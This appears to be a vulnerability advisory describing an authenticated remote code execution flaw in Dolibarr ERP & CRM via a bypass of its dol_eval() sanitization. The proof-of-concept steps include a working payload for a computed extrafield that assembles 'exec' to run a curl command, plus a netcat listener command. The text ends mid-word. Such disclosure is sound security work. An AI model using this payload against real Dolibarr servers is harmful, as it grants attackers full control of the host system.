### Summary Dolibarr ERP & CRM has an Authenticated Remote Code Execution vulnerabliity via an Eval Sanatizaiton Bypass. An attacker can inject a specially crafted payload to bypass all security checks within the dol_eval() function, allowing for remote code execution on the machine. This vulnerability completely undermines the application's confidentiality, integrity, and availability by granting an attacker full control over the underlying system. ### Proof of Concept <iframe width="560" height="315" src="https://www.youtube.com/embed/IQ31iRl2Z6g?si=xSHsWwzUpxxqls_s" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe> 1. Authenticate to the Dolibarr service 2. Go to `/user/admin/user_extrafields.php?action=create` 3. Create a new attribute with the following parameters: - Label: A uniqe string - Attribute: Can be the same as "Label" - Type: String (1 line) - Computed Field: `($z = "ex") && ($q = "ec") && ($cmd = "$z$q") && $cmd ("curl localhost:5555")` 4. Hit "Save" 5. Hit the pencil("modify") on the Label 6. Re-Enter the above payload into the computed field. 7. Open a netcat listener: `nc -lvp 5555` 8. Hit "Save" Obsid